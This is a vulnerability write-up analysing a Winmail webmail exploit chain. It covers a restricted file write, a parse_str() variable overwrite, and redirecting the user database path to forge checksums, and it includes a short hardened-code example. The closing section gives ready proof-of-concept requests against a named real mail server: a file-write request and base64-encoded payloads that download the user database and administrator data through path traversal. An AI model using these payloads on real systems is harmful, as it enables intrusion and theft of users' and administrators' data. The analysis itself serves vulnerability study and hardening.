Winmail getshell source code analysis (arbitrary file download)


This analysis follows the write-up at http://www.tuicool.com/articles/BFZ7Rze.

All of Winmail's global variables are defined in ./inc/config.php. A variable-overwrite vulnerability therefore lets an attacker overwrite any global.

Following the original author's approach, start with wap.php:

switch ($dest) {
    case 'index': include('../wap/index.php'); break;

When wap.php?dest=index is requested, index.php is included.

Look at index.php (located at ../wap/index.php):

$logofile = ''; // can be ignored
if ($logoimage != '') { // the file
    if (strncasecmp($logoimage, 'jpg:', 4) == 0 || strncasecmp($logoimage, 'gif:', 4) == 0
        || strncasecmp($logoimage, 'png:', 4) == 0) { // extension check: the first three characters are compared against jpg/gif/png
        $arrImage = explode(':', $logoimage); // split $logoimage into the array $arrImage
        if (count($arrImage) == 3) { // must have exactly three parts
            // destination path: $arrImage[0] becomes the extension, $f_domain is part of the file name,
            // $customizepath is the directory (taken from the globals)
            $logofile = $customizepath.$f_domain.'_logo.'.$arrImage[0];
            if (!file_exists($logofile) || filemtime($logofile) <= floatval($arrImage[1])) { // write the file if it does not exist (or is older than the supplied timestamp)
                $fullfile = $webmailhome_directory.$logofile;
                file_put_contents($fullfile, base64_decode($arrImage[2]));
            }
        }
    }
}

In this block the controllable variables are $logoimage and $f_domain: $logoimage controls the file extension and the file content, and $f_domain controls the file name.

This gives a file write with a restricted extension. Because it is limited to jpg, gif and png, it does not by itself yield a shell.

In viewsharenetdisk.php:

if (isset($f)) {
    $f = str_replace(' ', '+', $f);
    $f = base64_decode($f);
    parse_str($f);
}

parse_str() is the variable-overwrite point: every key in the decoded $f is registered as a variable in the current scope. The payload only needs to be base64-encoded, and any variable that is not reassigned afterwards is then fully attacker-controlled.

    if ($chksum != '' || $filename != '') {
        $item = ($chksum != '') ? $chksum : str_replace(' ', '+', $filename);
        echo 'aaa'.md5($item.'|'.$userinfo['userid'].'|'.$userinfo['createtime']).'aaa'; // prints the expected itemcode

        // check whether itemcode matches
        if ($itemcode != md5($item.'|'.$userinfo['userid'].'|'.$userinfo['createtime'])) {
            $smarty->assign('errCode', 1);
            $smarty->display($selected_theme.'/netdisk-viewshare.htm');
            exit;
        }
    }
}
...
...
if ($chksum != '') {
    echo '$chksum:'.md5($userid.'|'.$filename.'|'.$start).'$chksum:'; // prints the expected chksum

    // check whether chksum matches
    if ($chksum != md5($userid.'|'.$filename.'|'.$start)) {
        $smarty->assign('errCode', 2);
        $smarty->display($selected_theme.'/netdisk-viewshare.htm');
        exit;
    }

Following the flow, $chksum and $itemcode both have to pass validation. Both variables can be overwritten, but the expected md5 depends on $userinfo, which is unknown.

According to what is documented online, $userinfo is obtained by:

$domaininfo = load_domaininfo($domain);
$userinfo = load_userinfo($userid);

In the database layer, `new SqliteDB` is constructed from a variable:

inc/class.sqlitedb.php

function __construct($file) {
    $this->dbfile = $file;

    $this->Open();
}

inc/lib.php


function load_userinfo($name, $domain = null) {
    if (is_null($domain)) {
        $pos = strpos($name, '@');
        if ($pos !== false) {
            $domain = substr($name, $pos+1);
            $name = substr($name, 0, $pos);
        }
        else {
            $domain = '';
        }
    }

    global $mailuser_dbfile;
    echo $mailuser_dbfile; // prints the database path in use
    $db = new SqliteDB($mailuser_dbfile);

Here $file comes from $mailuser_dbfile. $mailuser_dbfile is defined in the global config, so at this point it can be overwritten.

So the chain is: use the file write to drop a crafted database file, overwrite $mailuser_dbfile so that Winmail opens that file instead, and the $userinfo it loads is then under our control. With a known $userinfo the checksums can be computed, which achieves arbitrary file download.
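The overwrite described above, reproduced as an added example that is not Winmail's code: the first function mirrors the one-argument parse_str() from viewsharenetdisk.php (via extract(), so it also runs on PHP 8), the second shows the hardened form that parses into an array and keeps only an allow-list of share parameters. The allow-list, the configured path and the sample payload are constructed for this demo.

```php
<?php
// Added example, not Winmail's code. $mailuser_dbfile stands in for the
// global defined in inc/config.php; SHARE_PARAMS and the payload are constructed.

declare(strict_types=1);

// Same effect as the one-argument parse_str() used in viewsharenetdisk.php:
// every key of the decoded query string becomes a variable in this scope,
// so a key named mailuser_dbfile silently replaces the configured path.
function vulnerableDbPath(string $f, string $mailuser_dbfile): string
{
    $f = base64_decode(str_replace(' ', '+', $f));
    parse_str($f, $vars);
    extract($vars);              // legacy parse_str($f) behaviour (removed in PHP 8)
    return $mailuser_dbfile;     // may now be attacker-chosen
}

// Hardened: strict decode, parse into an array, keep only the parameters the
// share page actually needs, and never let request data reach a global.
const SHARE_PARAMS = ['userid', 'opt', 'filename', 'itemcode', 'chksum', 'start'];

function hardenedShareParams(string $f): array
{
    $decoded = base64_decode(str_replace(' ', '+', $f), true);
    if ($decoded === false) {
        return [];               // reject malformed base64 outright
    }
    parse_str($decoded, $vars);
    $vars = array_intersect_key($vars, array_flip(SHARE_PARAMS));
    return array_filter($vars, 'is_string');   // drop nested arrays such as a[]=1
}

// Constructed payload in the shape of the page's PoC: override the global,
// then ask for a download.
$payload = base64_encode('mailuser_dbfile=../customer/x_logo.jpg&userid=admin&opt=download');
$configured = '/var/winmail/db/mailuser.db';   // constructed stand-in for config.php

printf("vulnerable path: %s\n", vulnerableDbPath($payload, $configured));
printf("hardened keys:   %s\n", implode(',', array_keys(hardenedShareParams($payload))));
```

The vulnerable function returns the attacker's path, while the hardened one never exposes a mailuser_dbfile key, so $mailuser_dbfile keeps its config.php value.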
http://mail.jida.com.cn/wap.php?dest=index


logoimage=jpg:1.jpg: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&f_domain=fghfgfghf1&customizepath=1

This writes the file customer/fghfgfghf1_logo.jpg.

Download user data:


viewsharenetdisk.php?userid=admin&f=bWFpbHVzZXJfZGJmaWxlPS5cY3VzdG9tZXJcZmdoZmdmZ2hmMV9sb2dvLmpwZyZ1c2VyY29kZT1kMWRmZDg4YTgwZTVjOWU4OTU2ODZhM2ZiYmUwMDI3OSZvcHQ9ZG93bmxvYWQmZmlsZW5hbWU9WEM0dUx5NHVMMlJoZEdFdmJXRnBiSFZ6WlhJdVpHST0maXRlbWNvZGU9YTMwMzk4ODJhMDk1M2RmM2E4NDBlOTVkZjBhNDg3NjImY2hrc3VtPTM1OGE2OTJlODk4OWQ0NDVhZGQ2YjU1OGNjYjU1Y2UxJnN0YXJ0PTEmbmV0ZGlza19zaGFyZV9leHBpcmU9MTQ3OTg2NTY5MzE=

 

Download administrator data:

viewsharenetdisk.php?userid=admin&f=bWFpbHVzZXJfZGJmaWxlPS5cY3VzdG9tZXJcZmdoZmdmZ2hmMV9sb2dvLmpwZyZ1c2VyY29kZT1kMWRmZDg4YTgwZTVjOWU4OTU2ODZhM2ZiYmUwMDI3OSZvcHQ9ZG93bmxvYWQmZmlsZW5hbWU9WEM0dUx5NHVMMlJoZEdFdllXUnRhVzUxYzJWeUxtTm1adz09Jml0ZW1jb2RlPTZhNzgzMTMzMjE5OGU0ZDU1NmQyYWY5ZDYxZWI4ZmIwJmNoa3N1bT1kYWI4YTQwN2JhMGFjOGRhYThhZjQyN2Q2NDU0OTQzZiZzdGFydD0xJm5ldGRpc2tfc2hhcmVfZXhwaXJlPTE0Nzk4NjU2OTMx
